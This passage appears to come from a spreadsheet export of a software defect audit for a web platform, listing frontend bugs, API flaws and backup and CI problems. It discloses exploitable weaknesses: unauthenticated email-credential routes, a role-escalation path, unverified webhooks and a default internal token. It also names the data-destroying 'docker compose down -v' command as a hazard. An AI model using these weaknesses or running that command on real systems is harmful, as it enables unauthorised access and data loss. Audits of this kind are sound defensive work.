`eslint-plugin-react-hooks` in particular would have caught two of the defects in this
file — [FE-08](#fe-08--two-effects-have-wrong-dependency-arrays) is exactly what the
exhaustive-deps rule exists for.
- [`frontend/package.json`](../../../frontend/package.json)
- Also recorded as **D-39** in the platform register</t>
  </si>
  <si>
    <t>**Fix:** add `.eslintrc.cjs`. Every plugin is already installed.
---</t>
  </si>
  <si>
    <t>FE-03</t>
  </si>
  <si>
    <t>There is no test runner</t>
  </si>
  <si>
    <t>### FE-03 — There is no test runner
**✅ Verified · High**
Two `.test.ts` files exist and both import from `vitest`. Neither `vitest` nor `jest`
appears anywhere in `package.json`. There is no `test` script.
`useExecutionEvents.test.ts` even documents the missing setup in its own header:
```ts
* To run: install vitest (`npm install --save-dev vitest ...`) then `npx vitest run`.
```
Two knock-on effects:
- `tsconfig.json` **excludes** `*.test.ts`, so the tests are not type-checked by
  `npm run build` either. `useExecutionEvents.test.ts`'s local `_INITIAL` is already missing
  the `spans` field added later to `ExecutionEventState` — it would not compile.
- `cortex-helpers.ts` is imported only by its own test. It is tested dead code.
- [`frontend/src/hooks/useExecutionEvents.test.ts`](../../../frontend/src/hooks/useExecutionEvents.test.ts)</t>
  </si>
  <si>
    <t>- [`frontend/src/components/agent/cortex-helpers.test.ts`](../../../frontend/src/components/agent/cortex-helpers.test.ts)
- Also recorded as **D-40** in the platform register
**Fix:** `npm i -D vitest jsdom`, add `"test": "vitest run"`, drop the `exclude`.
---</t>
  </si>
  <si>
    <t>FE-04</t>
  </si>
  <si>
    <t>If you forget .env, development talks to production</t>
  </si>
  <si>
    <t>### FE-04 — If you forget `.env`, development talks to production
**📄 Doc-reported · High**
`api.client.ts` falls back to `https://gateway.hirebuddha.com/api/v1` when no base URL is
configured.
A developer who clones the repository and runs `npm run dev` without creating `.env` gets a
local UI issuing **writes against production**, with no warning of any kind.
Compounding it: there are **two** base-URL variables with different rules —
`VITE_API_BASE_URL` must include `/api/v1`, `VITE_API_URL` must not because the code appends
it — and the second is undocumented in `.env.example`.
- [`frontend/src/services/api.client.ts`](../../../frontend/src/services/api.client.ts)
**Fix:** fall back to `http://localhost:8001` and warn on the console. A wrong local URL is
a five-second fix; a production write is not.
---</t>
  </si>
  <si>
    <t>FE-05</t>
  </si>
  <si>
    <t>Three legacy redirects emit a literal :id</t>
  </si>
  <si>
    <t>### FE-05 — Three legacy redirects emit a literal `:id`
**✅ Verified · Medium**
```tsx
&lt;Route path="/agents/:id"    element={&lt;Navigate to="/ai/entities/edit/:id" replace /&gt;} /&gt;
&lt;Route path="/workflows/:id" element={&lt;Navigate to="/ai/entities/edit/:id" replace /&gt;} /&gt;
&lt;Route path="/execute/:type/:id" element={&lt;Navigate to="/ai/execute/:id" replace /&gt;} /&gt;
```
`&lt;Navigate&gt;` does not interpolate route parameters. Any old bookmark hitting these lands on
a URL containing the literal string `:id`, which matches nothing and falls through to the
catch-all.
The correct pattern already exists in the same file — `ExecutionRedirect` reads `useParams`
and builds the target.
- [`frontend/src/router/index.tsx:213`](../../../frontend/src/router/index.tsx:213), [`:214`](../../../frontend/src/router/index.tsx:214), [`:227`](../../../frontend/src/router/index.tsx:227)
---</t>
  </si>
  <si>
    <t>3. T1 — Broken behaviour</t>
  </si>
  <si>
    <t>FE-06</t>
  </si>
  <si>
    <t>Bad JSON in the IO-contract fields silently kills the save</t>
  </si>
  <si>
    <t>### FE-06 — Bad JSON in the IO-contract fields silently kills the save
**📄 Doc-reported · Medium**
`EntityConfigurationTabs` calls `JSON.parse` on the input/output schema textareas with **no
try/catch**. A malformed schema throws inside the save handler, the save never completes,
and — with no error boundary ([FE-01](#fe-01--there-is-no-error-boundary)) — the user may
get a blank page instead of a validation message.
- [`frontend/src/pages/ai/EntityConfigurationTabs.tsx:682`](../../../frontend/src/pages/ai/EntityConfigurationTabs.tsx:682)
---</t>
  </si>
  <si>
    <t>FE-07</t>
  </si>
  <si>
    <t>Half the pages bypass apiClient and lose token refresh</t>
  </si>
  <si>
    <t>### FE-07 — Half the pages bypass `apiClient` and lose token refresh
**📄 Doc-reported · High**
`apiClient` implements the 401 → refresh → retry interceptor. Everything in
`pages/streaming/` and the lookups in `PhonePool.tsx` use raw `fetch`.
So on those pages, the moment the 30-minute access token expires, requests start failing
with 401 and **do not recover** — while the rest of the app silently refreshes and carries
on. The user sees one area of the product break for no visible reason.
- [`frontend/src/pages/streaming/`](../../../frontend/src/pages/streaming/)
- [`frontend/src/pages/PhonePool.tsx`](../../../frontend/src/pages/PhonePool.tsx)
---</t>
  </si>
  <si>
    <t>FE-08</t>
  </si>
  <si>
    <t>Two effects have wrong dependency arrays</t>
  </si>
  <si>
    <t>### FE-08 — Two effects have wrong dependency arrays
**📄 Doc-reported · Medium**
| Effect | Problem |
|---|---|
| `MainLayout`'s submenu auto-open | mutates a copy of `openSubmenus` and omits it from the dependency array |
| `EntityFlow`'s planned-tool sync | reads `nodes` without depending on it |
Both are stale-closure bugs: the effect operates on a snapshot from an earlier render. The
symptoms are intermittent and hard to reproduce — a submenu that does not open, a tool that
does not appear on the canvas.
`eslint-plugin-react-hooks` is installed and would flag both, if there were a config
([FE-02](#fe-02--npm-run-lint-cannot-run)).
- [`frontend/src/components/layout/MainLayout.tsx:152`](../../../frontend/src/components/layout/MainLayout.tsx:152)–166
- [`frontend/src/pages/ai/EntityFlow.tsx:188`](../../../frontend/src/pages/ai/EntityFlow.tsx:188)–241
---</t>
  </si>
  <si>
    <t>FE-09</t>
  </si>
  <si>
    <t>Timestamps are wrong unless routed through a helper</t>
  </si>
  <si>
    <t>### FE-09 — Timestamps are wrong unless routed through a helper
**📄 Doc-reported · Medium**
The backend emits **naive UTC** ISO strings. `new Date(s)` parses them as browser-local, so
every timestamp is off by the viewer's UTC offset.
`parseServerDate` in `@/utils/datetime` exists to fix this. Nothing enforces its use, and a
missed call produces a plausible-looking wrong time rather than an error — which is the
hardest kind of bug to spot in a dashboard.
The root cause is upstream: all `DateTime` columns are naive
([DM-12](03-DATA-MODEL-DEFECTS.md#4-t2--wrong-types-and-dead-tables)).
---</t>
  </si>
  <si>
    <t>FE-10</t>
  </si>
  <si>
    <t>getStepToolLogs is a stub returning false</t>
  </si>
  <si>
    <t>### FE-10 — `getStepToolLogs` is a stub returning `false`
**📄 Doc-reported · Medium**
A function used by the execution detail view returns `false` for everything, so the tool
logs it is meant to surface never appear.
Combined with [EP-21](06-EXECUTION-PIPELINE-DEFECTS.md#ep-21--the-execution-detail-page-finds-artifacts-by-regex)
— artifacts located by regex rather than `run_id` — the run detail page is missing two
independent kinds of evidence about what a run actually did.
- [`frontend/src/pages/ai/ExecutionDetail.tsx:83`](../../../frontend/src/pages/ai/ExecutionDetail.tsx:83)
---</t>
  </si>
  <si>
    <t>FE-11</t>
  </si>
  <si>
    <t>The social login buttons do nothing</t>
  </si>
  <si>
    <t>### FE-11 — The social login buttons do nothing
**📄 Doc-reported · Medium**
The Google and Microsoft buttons on the login page have **no handler**. They render, they
look clickable, and clicking them does nothing.
The backend has an OAuth path (`get_or_create_oauth_user`, `POST /auth/oauth/{provider}`),
so the feature is half-built rather than absent.
- [`frontend/src/pages/auth/LoginPage.tsx:76`](../../../frontend/src/pages/auth/LoginPage.tsx:76)–85
---</t>
  </si>
  <si>
    <t>FE-12</t>
  </si>
  <si>
    <t>react-hook-form, zod, @hookform/resolvers, date-fns</t>
  </si>
  <si>
    <t>| **FE-12** | `react-hook-form`, `zod`, `@hookform/resolvers`, `date-fns` | Four dependencies with **zero imports** anywhere in `src/`. Confirmed by grep. The frontend README claims they are used | ✅ Verified |</t>
  </si>
  <si>
    <t>4. T2 — Dead code and unused dependencies</t>
  </si>
  <si>
    <t>FE-13</t>
  </si>
  <si>
    <t>[pages/assets/AssetLibrary.tsx](../../../frontend/src/pages/assets/AssetLibrary.tsx)</t>
  </si>
  <si>
    <t>| **FE-13** | [`pages/assets/AssetLibrary.tsx`](../../../frontend/src/pages/assets/AssetLibrary.tsx) | 314 lines, not routed, imported by nothing but its own CSS. Replaced by `Artifacts.tsx`. Also [PO-13](01-PRODUCT-OVERVIEW-DEFECTS.md#4-t2--dead-code-and-dead-surfaces) | ✅ Verified |</t>
  </si>
  <si>
    <t>FE-14</t>
  </si>
  <si>
    <t>Six unmounted agent-kernel components</t>
  </si>
  <si>
    <t>| **FE-14** | Six unmounted agent-kernel components | `PlanCandidatesCompare`, three `SupervisorAndBandit` widgets, `ProvenanceRibbon`, and the `cortex-helpers` module. All fully built, none mounted anywhere | 📄 Doc-reported |</t>
  </si>
  <si>
    <t>FE-15</t>
  </si>
  <si>
    <t>The duplicate .gap-1 rules</t>
  </si>
  <si>
    <t>| **FE-15** | The duplicate `.gap-1` rules | Defined three times in `global.css` (lines 312, 480, 579). The last wins, with the wrong value | 📄 Doc-reported |</t>
  </si>
  <si>
    <t>FE-16</t>
  </si>
  <si>
    <t>The unused response variable in useAuth</t>
  </si>
  <si>
    <t>| **FE-16** | The unused `response` variable in `useAuth` | Assigned from `authService.login` / `register` and never read. Would fail `noUnusedLocals` in a checked position | 📄 Doc-reported |</t>
  </si>
  <si>
    <t>FE-17</t>
  </si>
  <si>
    <t>The WebGL background never sleeps</t>
  </si>
  <si>
    <t>### FE-17 — The WebGL background never sleeps
**📄 Doc-reported · High**
`AnimatedBackground` does **6,300 matrix writes per frame** plus a full-screen bloom pass.
It has:
- no visibility check — it keeps rendering on a hidden tab,
- no `prefers-reduced-motion` check,
- and its `requestAnimationFrame` is **never cancelled on unmount**.
`three` (~600 KB minified) is imported by it, and `App.tsx` imports
`AnimatedBackground` **eagerly** — so 600 KB is in the entry chunk and must download before
the login form can render.
On a laptop this is a fan spinning up. On a phone it is battery drain and a slow first
paint on every visit.
- [`frontend/src/components/layout/AnimatedBackground.tsx`](../../../frontend/src/components/layout/AnimatedBackground.tsx)
**Fix, in order of value:** cancel the RAF on unmount, pause on `document.hidden`, respect</t>
  </si>
  <si>
    <t>`prefers-reduced-motion`, and lazy-load the component so `three` leaves the entry chunk.
---</t>
  </si>
  <si>
    <t>5. T3 — Performance</t>
  </si>
  <si>
    <t>FE-18</t>
  </si>
  <si>
    <t>ExecutionDetail walks the whole run tree on every render</t>
  </si>
  <si>
    <t>### FE-18 — `ExecutionDetail` walks the whole run tree on every render
**📄 Doc-reported · High**
1,111 lines with **zero** `useMemo`, `useCallback` or `React.memo`.
`findArtifactInTree`, `flattenChildSteps` and `collectChildLLMLogs` all run on every render
— recursing the entire child-run tree and regex-scanning every tool-log output string.
A 3-second poll drives those re-renders. So an open execution page performs a full tree walk
plus a regex sweep every three seconds, indefinitely.
- [`frontend/src/pages/ai/ExecutionDetail.tsx`](../../../frontend/src/pages/ai/ExecutionDetail.tsx)
---</t>
  </si>
  <si>
    <t>FE-19</t>
  </si>
  <si>
    <t>The execution poll never stops</t>
  </si>
  <si>
    <t>### FE-19 — The execution poll never stops
**📄 Doc-reported · High**
The interval in the legacy body is created once with `[id]` dependencies and only **skips
work** when the status is terminal. The timer itself keeps firing forever.
A single open execution page issues roughly **1.3 requests per second, indefinitely** —
`AgentLoopExecutionDetail` polls three endpoints on a 3-second cycle on top of it. Leave a
tab open overnight and that is ~45,000 requests.
- [`frontend/src/pages/ai/ExecutionDetail.tsx:557`](../../../frontend/src/pages/ai/ExecutionDetail.tsx:557)
**Fix:** `clearInterval` on terminal status. One line, and it removes most of the app's
background load.
---</t>
  </si>
  <si>
    <t>FE-20</t>
  </si>
  <si>
    <t>EntityConfigurationTabs re-renders everything on every keystroke</t>
  </si>
  <si>
    <t>### FE-20 — `EntityConfigurationTabs` re-renders everything on every keystroke
**📄 Doc-reported · Medium**
1,780 lines, roughly **70 `useState`** in one component, zero `useMemo` and two
`useCallback`.
Every keystroke in any field re-executes the whole component function — including all the
`.filter()` calls for the tool list, the knowledge-base items and the CORTEX trees. Only
the active tab is mounted, but the work to decide what to render is done for all six.
- [`frontend/src/pages/ai/EntityConfigurationTabs.tsx`](../../../frontend/src/pages/ai/EntityConfigurationTabs.tsx)
---</t>
  </si>
  <si>
    <t>FE-21</t>
  </si>
  <si>
    <t>No caching layer, and fan-out on mount</t>
  </si>
  <si>
    <t>### FE-21 — No caching layer, and fan-out on mount
**📄 Doc-reported · Medium**
| Pattern | Where |
|---|---|
| Fan-out on mount | `PhonePool` (5 requests), `AppAdminReports` (7), `TenantAdminReports` (6) |
| Refetch-everything after a mutation | `PhonePool`, `PlatformManagement`, `ToolManagement` |
| No cache at all | everywhere — navigating away and back refetches from scratch |
| N+1 on the entity canvas | `EntityFlow.fetchLibraries` pulls **all** entities and **all** tools every time the Hierarchy tab mounts |
The canvas one is the sharpest: fine at 50 entities, painful at 5,000, and it re-runs on
every tab switch.
---</t>
  </si>
  <si>
    <t>FE-22</t>
  </si>
  <si>
    <t>recharts may be duplicated across 13 chunks</t>
  </si>
  <si>
    <t>### FE-22 — `recharts` may be duplicated across 13 chunks
**📄 Doc-reported · Medium**
`React.lazy` per route is right, and each page is its own chunk. But there is no
`manualChunks` configuration, so whether `recharts` is hoisted into a shared chunk or copied
into each of the 13 report chunks is left to Rollup's defaults.
`index.html` additionally blocks on a Google Fonts stylesheet and the Razorpay script on
**every** page load, including pages that will never take a payment.
---</t>
  </si>
  <si>
    <t>FE-23</t>
  </si>
  <si>
    <t>useState(entity?.x) only reads the prop once</t>
  </si>
  <si>
    <t>### FE-23 — `useState(entity?.x)` only reads the prop once
**📄 Doc-reported · Medium**
`EntityConfigurationTabs` initialises roughly 70 state variables from props. `useState`
reads its initial value **once**, on first render.
Today the parent guards against mounting before the entity loads. Any change that removes
that guard produces a silently empty form — the user edits blank fields and saves them over
a real entity.
---</t>
  </si>
  <si>
    <t>API-01</t>
  </si>
  <si>
    <t>Four endpoints are open or wrongly gated</t>
  </si>
  <si>
    <t>17. API Reference</t>
  </si>
  <si>
    <t>### API-01 — Four endpoints are open or wrongly gated
**✅ Verified · Critical**
| Route | Guard | Consequence |
|---|---|---|
| `POST/GET/DELETE /api/v1/email/connections*` (5 routes) | **none** — `Depends(get_db)` only | Anyone can create, list, delete and validate SMTP/IMAP credentials for any company |
| `GET /api/v1/credits/subscription-tiers` | **none** | Pricing readable without a token. The sibling POST/PUT/DELETE *are* admin-gated |
| `GET /api/v1/reports/costing` | `get_current_user` only | Any user reads their company's raw provider cost and infers the markup |
| `PATCH /api/v1/companies/{id}` | company match only, **no role check** | Any user can suspend their own company |
| `PATCH /api/v1/users/{id}` | admin-in-company, no role validation | A `tenant_admin` can set their own role to `app_admin` |
The email router is the standout: five routes managing credentials with no authentication
dependency at all.</t>
  </si>
  <si>
    <t>- [`ai/email_router.py:88`](../../../backend/src/ai/email_router.py:88), [`:94`](../../../backend/src/ai/email_router.py:94), [`:159`](../../../backend/src/ai/email_router.py:159), [`:179`](../../../backend/src/ai/email_router.py:179), [`:204`](../../../backend/src/ai/email_router.py:204)
- [`billing/credits_router.py:199`](../../../backend/src/billing/credits_router.py:199)
- [`billing/billing_router.py:148`](../../../backend/src/billing/billing_router.py:148)
- [`auth/company_router.py:110`](../../../backend/src/auth/company_router.py:110)
- [`auth/user_router.py:48`](../../../backend/src/auth/user_router.py:48)
Full write-ups in
[04 — Auth, RBAC &amp; tenancy](04-AUTH-RBAC-TENANCY-DEFECTS.md#2-t0--privilege-escalation-and-open-doors).
Also **D-04**, **D-08**, **D-09** in the platform register.
---</t>
  </si>
  <si>
    <t>17-API-REFERENCE-DEFECTS.md</t>
  </si>
  <si>
    <t>2. T0 — Reachable and should not be</t>
  </si>
  <si>
    <t>API-02</t>
  </si>
  <si>
    <t>The cron endpoints move money over HTTP</t>
  </si>
  <si>
    <t>### API-02 — The cron endpoints move money over HTTP
**✅ Verified · High**
`POST /api/v1/cron/daily-credits` and `POST /api/v1/cron/monthly-billing` grant credits.
They are `app_admin`-only, which is right, but:
- nothing schedules them, so triggering them by hand is the **only** way they ever run
  ([BC-04](14-BILLING-AND-CREDITS-DEFECTS.md#bc-04--the-billing-crons-are-never-scheduled));
- the daily job **resets** `daily_credits` rather than topping up, so an accidental second
  call is not idempotent;
- the monthly job grants credits regardless of whether money moved.
An operationally necessary endpoint that is also a money lever, with no idempotency and no
audit trail beyond a log line.
- [`billing/cron_router.py`](../../../backend/src/billing/cron_router.py)
---</t>
  </si>
  <si>
    <t>API-03</t>
  </si>
  <si>
    <t>No webhook signature verification on the gateway's inbound route</t>
  </si>
  <si>
    <t>### API-03 — No webhook signature verification on the gateway's inbound route
**✅ Verified · Critical**
`POST /webhook/inbound` creates executions. Every `validate_signature` returns `True`, and
the result is logged and ignored regardless.
Full write-up:
[GW-01](13-GATEWAY-AND-REALTIME-DEFECTS.md#gw-01--no-webhook-signature-is-ever-verified-and-a-failure-would-not-block).
Listed here because this is the route an integrator will find first, and the reference
should say plainly that it is unauthenticated.
---</t>
  </si>
  <si>
    <t>API-04</t>
  </si>
  <si>
    <t>POST /internal/event is protected by a default secret</t>
  </si>
  <si>
    <t>### API-04 — `POST /internal/event` is protected by a default secret
**✅ Verified · High**
It is the one route hard-blocked at the gateway middleware, and it is protected by
`X-Internal-Token` compared with `!=` against `INTERNAL_TOKEN`, which defaults to
`change-me-in-production` in code **and** in `.env.example`.
It can create executions.
- [`gateway/auth_middleware.py`](../../../backend/src/gateway/auth_middleware.py)
- [`gateway/gateway_config.py:32`](../../../backend/src/gateway/gateway_config.py:32)
---</t>
  </si>
  <si>
    <t>API-05</t>
  </si>
  <si>
    <t>The frontend calls a delete route that does not exist</t>
  </si>
  <si>
    <t>### API-05 — The frontend calls a delete route that does not exist
**✅ Verified · High**
`KnowledgeBase.tsx` calls `DELETE /ai/documents/{id}`. `ai/router.py` declares only
`POST /documents/upload`, `GET /documents` and `POST /documents/search`.
- [`frontend/src/pages/KnowledgeBase.tsx:106`](../../../frontend/src/pages/KnowledgeBase.tsx:106)
- [`ai/router.py:606`](../../../backend/src/ai/router.py:606), [`:658`](../../../backend/src/ai/router.py:658), [`:667`](../../../backend/src/ai/router.py:667)
Same as [PO-01](01-PRODUCT-OVERVIEW-DEFECTS.md#po-01--deleting-a-knowledge-base-document-always-fails).
---</t>
  </si>
  <si>
    <t>3. T1 — Documented and not reachable</t>
  </si>
  <si>
    <t>API-06</t>
  </si>
  <si>
    <t>Password reset: two documented routes, neither implemented</t>
  </si>
  <si>
    <t>### API-06 — Password reset: two documented routes, neither implemented
**✅ Verified · High**
The frontend posts to `/auth/forgot-password` and `/auth/reset-password`. Grepping the
whole backend for `forgot`, `reset-password` or `new_password` returns **nothing**.
Both pages fail against a 404 and show "Failed to send reset email".
Same as [AU-06](04-AUTH-RBAC-TENANCY-DEFECTS.md#au-06--password-reset-works-in-the-browser-and-does-not-exist-in-the-backend).
---</t>
  </si>
  <si>
    <t>API-07</t>
  </si>
  <si>
    <t>Transcript endpoints exist only on a service nobody starts</t>
  </si>
  <si>
    <t>### API-07 — Transcript endpoints exist only on a service nobody starts
**✅ Verified · High**
`transcript_api.py` declares four endpoints under `/api/calls/*` and is mounted **only** by
`voice/main.py` on port 8002, which `start_services.sh` does not launch and the gateway
describes as retired.
The call-detail UI that consumes them is therefore broken.
- [`voice/transcript_api.py:21`](../../../backend/src/voice/transcript_api.py:21)
- Also **D-15**; the decided fix is **W-1** — move the router onto the gateway
Note the paths have **no `/v1` segment**. Decide whether to normalise `/api/calls` →
`/api/v1/calls` during the move; doing it later is a second breaking change.
---</t>
  </si>
  <si>
    <t>API-08</t>
  </si>
  <si>
    <t>/api/v1/phone-pool/ does not exist at runtime</t>
  </si>
  <si>
    <t>### API-08 — `/api/v1/phone-pool/*` does not exist at runtime
**✅ Verified · Medium**
Seven routes are declared in `phone_pool_router.py`. The router is never mounted —
`main.py` says *"Phone Number Pool is now unified into phone_number_router"*.
| Dead | Live |
|---|---|
| `POST /api/v1/phone-pool` | `POST /api/v1/phone-numbers` |
| `POST /api/v1/phone-pool/bulk` | `.../bulk` |
| `POST /api/v1/phone-pool/sync` | `.../sync` |
| `GET /api/v1/phone-pool` | `GET /api/v1/phone-numbers` |
| `POST /api/v1/phone-pool/{id}/claim` | `.../{id}/claim` |
| `POST /api/v1/phone-pool/{id}/release` | `.../{id}/release` |
| `DELETE /api/v1/phone-pool/{id}` | `DELETE /api/v1/phone-numbers/{id}` |
- [`voice/phone_pool_router.py`](../../../backend/src/voice/phone_pool_router.py) — 701 lines, unmounted
---</t>
  </si>
  <si>
    <t>API-09</t>
  </si>
  <si>
    <t>A failed import silently removes a whole route group</t>
  </si>
  <si>
    <t>### API-09 — A failed import silently removes a whole route group
**✅ Verified · High**
About a dozen routers are mounted inside `try/except ImportError` with only a
`logger.warning`: billing, credits, cron, reports, email, social, tool management, voice
webhooks, phone numbers, sessions, messaging.
If one fails to import, the app starts normally and that **entire route group returns
404**. There is no signal on `/health`, in the OpenAPI schema, or anywhere else.
So "the endpoint is missing" has two indistinguishable causes: it was never written, or its
router failed to load.
- [`backend/src/main.py:120`](../../../backend/src/main.py:120) onwards
---</t>
  </si>
  <si>
    <t>API-10</t>
  </si>
  <si>
    <t>GET\|POST /api/v1/ai/phase11/{subpath}</t>
  </si>
  <si>
    <t>| **API-10** | `GET\|POST /api/v1/ai/phase11/{subpath}` | 307 shim carrying an explicit *"Remove after 2026-09-01"* comment. **That date is today.** Remove the five matching legacy routes from the frontend router in the same change | ✅ Verified |</t>
  </si>
  <si>
    <t>API-11</t>
  </si>
  <si>
    <t>GET /api/v1/assets and /api/v1/assets/{path}</t>
  </si>
  <si>
    <t>| **API-11** | `GET /api/v1/assets` and `/api/v1/assets/{path}` | Redirect shims to `/api/v1/artifacts*`. The legacy `assets` table they existed for was never dropped either — see [DM-10](03-DATA-MODEL-DEFECTS.md#4-t2--wrong-types-and-dead-tables) | ✅ Verified |</t>
  </si>
  <si>
    <t>API-12</t>
  </si>
  <si>
    <t>| **API-12** | [`voice/phone_pool_router.py`](../../../backend/src/voice/phone_pool_router.py) | 701 lines, never mounted. **Keep** `phone_pool_models.py` — the live router still imports `PhoneNumber` from it. Also **D-22** | ✅ Verified |</t>
  </si>
  <si>
    <t>API-13</t>
  </si>
  <si>
    <t>GET /api/v1/auth/admin-only</t>
  </si>
  <si>
    <t>| **API-13** | `GET /api/v1/auth/admin-only` | Exists purely to probe the admin role guard. A debug route on the public surface | ✅ Verified |</t>
  </si>
  <si>
    <t>API-14</t>
  </si>
  <si>
    <t>Nine admin routes have a doubled admin/admin segment</t>
  </si>
  <si>
    <t>### API-14 — Nine admin routes have a doubled `admin/admin` segment
**✅ Verified · Low · accept**
The router is declared `APIRouter(prefix="/ai/admin")` and mounted with `prefix="/api/v1"`.
Nine of its routes then declare their own path starting `/admin/...`, producing
`/api/v1/ai/admin/admin/kpi/runs` and eight siblings.
- [`ai/api/admin.py:60`](../../../backend/src/ai/api/admin.py:60) — the router prefix
- [`ai/api/admin.py:479`](../../../backend/src/ai/api/admin.py:479), [`:574`](../../../backend/src/ai/api/admin.py:574), [`:619`](../../../backend/src/ai/api/admin.py:619), [`:653`](../../../backend/src/ai/api/admin.py:653), [`:706`](../../../backend/src/ai/api/admin.py:706), [`:748`](../../../backend/src/ai/api/admin.py:748), [`:966`](../../../backend/src/ai/api/admin.py:966), [`:1160`](../../../backend/src/ai/api/admin.py:1160), [`:1202`](../../../backend/src/ai/api/admin.py:1202)
**Decision: leave it.** Cosmetic, and changing it breaks the admin UI for no user-visible
gain. Also **D-41**. Recorded so it is not "fixed" in passing.
---</t>
  </si>
  <si>
    <t>5. T3 — Inconsistency across the surface</t>
  </si>
  <si>
    <t>API-15</t>
  </si>
  <si>
    <t>/api/social-connections breaks the versioning convention</t>
  </si>
  <si>
    <t>### API-15 — `/api/social-connections` breaks the versioning convention
**✅ Verified · Low**
Declared as `APIRouter(prefix="/api/social-connections")` — the only business route in the
platform with no `/v1` segment.
Adding `/v1` is a breaking change for any client already using it. Worth doing now, while
there are no external consumers.
- [`ai/social_router.py:25`](../../../backend/src/ai/social_router.py:25)
---</t>
  </si>
  <si>
    <t>API-16</t>
  </si>
  <si>
    <t>There is no universal pagination</t>
  </si>
  <si>
    <t>### API-16 — There is no universal pagination
**📄 Doc-reported · Medium**
Every list endpoint decides for itself. `GET /config/integrations` as `app_admin` returns
**every company's rows** with no pagination at all
([LP-11 context](10-LLM-PROVIDERS-DEFECTS.md)). `GET /ai/entities`, the execution list and
the artifact list all differ.
A client cannot write one paging helper, and no endpoint degrades gracefully as data grows.
---</t>
  </si>
  <si>
    <t>API-17</t>
  </si>
  <si>
    <t>Full paths chain two prefixes, so the decorator misleads</t>
  </si>
  <si>
    <t>### API-17 — Full paths chain two prefixes, so the decorator misleads
**✅ Verified · Low**
`include_router(..., prefix="/api/v1")` + `APIRouter(prefix="/ai")` +
`@router.post("/entities")` = `/api/v1/ai/entities`.
Reading the decorator alone gives the wrong path. Combined with
[API-14](#api-14--nine-admin-routes-have-a-doubled-adminadmin-segment), the real path can
be three concatenations away from what the code shows.
---</t>
  </si>
  <si>
    <t>API-18</t>
  </si>
  <si>
    <t>DELETE /api/v1/ai/entities/{id} is a soft delete</t>
  </si>
  <si>
    <t>### API-18 — `DELETE /api/v1/ai/entities/{id}` is a soft delete
**📄 Doc-reported · Medium**
The row stays; `status` becomes `DELETED` and `deleted_at` is set, recursively across
descendants.
That is a reasonable design and the wrong HTTP verb semantics. A client that deletes and
then lists will still see the entity in any query that forgets
`.where(status != "DELETED")` — and there is no default filter
([DM-16](03-DATA-MODEL-DEFECTS.md#dm-16--soft-delete-has-no-default-filter)).
---</t>
  </si>
  <si>
    <t>API-19</t>
  </si>
  <si>
    <t>Two similarly named tool endpoints return different things</t>
  </si>
  <si>
    <t>### API-19 — Two similarly named tool endpoints return different things
**📄 Doc-reported · Low**
`GET /api/v1/ai/tools` returns tenant-visible tools. `GET /api/v1/ai/tool-registry` returns
the full registry. The names do not signal the difference, and only one is admin-gated.
---</t>
  </si>
  <si>
    <t>API-20</t>
  </si>
  <si>
    <t>The credentials guide documents the wrong path prefix</t>
  </si>
  <si>
    <t>### API-20 — The credentials guide documents the wrong path prefix
**📄 Doc-reported · Low**
`AI_MODEL_CREDENTIALS_GUIDE.md` documents `/api/config/...`. The real prefix is
`/api/v1/config/...`. Anyone following the guide gets a 404 on their first call.
---</t>
  </si>
  <si>
    <t>IN-01</t>
  </si>
  <si>
    <t>Backups are monthly and on the same disk as the database</t>
  </si>
  <si>
    <t>18. Infrastructure, Deployment &amp; Operations</t>
  </si>
  <si>
    <t>### IN-01 — Backups are monthly and on the same disk as the database
**✅ Verified · Critical**
`setup_cron.sh` registers `db_backup.sh` at `0 2 1 * *` — 02:00 on the **1st of each
month**. Retention is 90 days.
So the recovery point objective is up to **31 days**. For a platform holding conversation
transcripts, billing ledgers and encrypted third-party credentials, that means a failure on
the 30th loses a month of everything.
`BACKUP_ROOT` also defaults to a path **inside the repository**, so the dumps live on the
same disk as the database they protect. One disk failure loses both.
- [`deploy/backup/setup_cron.sh`](../../../deploy/backup/setup_cron.sh)
- [`deploy/backup/db_backup.sh:28`](../../../deploy/backup/db_backup.sh:28)
**Fix, in order:** daily dumps first, off-host storage second, WAL archiving third.
---</t>
  </si>
  <si>
    <t>18-INFRASTRUCTURE-AND-DEPLOYMENT-DEFECTS.md</t>
  </si>
  <si>
    <t>2. T0 — Data loss and recovery</t>
  </si>
  <si>
    <t>IN-02</t>
  </si>
  <si>
    <t>The backup script writes to a path that does not exist here</t>
  </si>
  <si>
    <t>### IN-02 — The backup script writes to a path that does not exist here
**✅ Verified · Critical**
```bash
BACKUP_ROOT="${BACKUP_ROOT:-/home/rahul/workspace/hb-proto-3/deploy/backup/dumps}"
LOG_DIR="${LOG_DIR:-/home/rahul/workspace/hb-proto-3/deploy/backup/logs}"
```
`hb-proto-3` is an **older checkout**. This repository is at
`/home/rahul/workspace/hire-buddha-app`. The cron line in the script header points at the
same stale path.
`mkdir -p` will happily create the old directory, so the script does not error — it writes
backups somewhere nobody is looking, or writes them into a directory that a later cleanup
removes.
Combined with [IN-01](#in-01--backups-are-monthly-and-on-the-same-disk-as-the-database),
the honest statement is: **nobody has verified that a usable backup exists.**
- [`deploy/backup/db_backup.sh:12`](../../../deploy/backup/db_backup.sh:12), [`:28`](../../../deploy/backup/db_backup.sh:28), [`:29`](../../../deploy/backup/db_backup.sh:29)</t>
  </si>
  <si>
    <t>**Fix:** derive the paths from the script's own location, and check the newest dump before
trusting anything else in this section.
---</t>
  </si>
  <si>
    <t>IN-03</t>
  </si>
  <si>
    <t>There is no restore test</t>
  </si>
  <si>
    <t>### IN-03 — There is no restore test
**📄 Doc-reported · High**
The document gives a restore command. Nothing runs it. A `pg_dump` that has never been
restored is a file, not a backup — and this one uses `--no-owner --no-privileges`, so the
restore will not recreate roles or grants.
**Fix:** a monthly job that restores the newest dump into a scratch database and runs one
sanity query. Anything less is unverified.
---</t>
  </si>
  <si>
    <t>IN-04</t>
  </si>
  <si>
    <t>docker compose down -v deletes the database</t>
  </si>
  <si>
    <t>### IN-04 — `docker compose down -v` deletes the database
**📄 Doc-reported · High**
Both Postgres and Redis use named volumes. `stop_services.sh` correctly runs
`docker compose down` **without** `-v`, so data survives a normal stop/start.
Recorded because the destructive variant is one character away, it appears in Docker
documentation everywhere, and with
[IN-01](#in-01--backups-are-monthly-and-on-the-same-disk-as-the-database) the recovery is up
to a month old.
---</t>
  </si>
  <si>
    <t>IN-05</t>
  </si>
  <si>
    <t>The repository has no functioning CI</t>
  </si>
  <si>
    <t>### IN-05 — The repository has no functioning CI
**✅ Verified · Critical**
There is exactly one GitHub Actions workflow, and it triggers on:
```yaml
paths: ["backend/cortex_memory/**"]
```
That directory is now `backend/cortex_memory_moved_to_pypi_repo/`. The filter matches
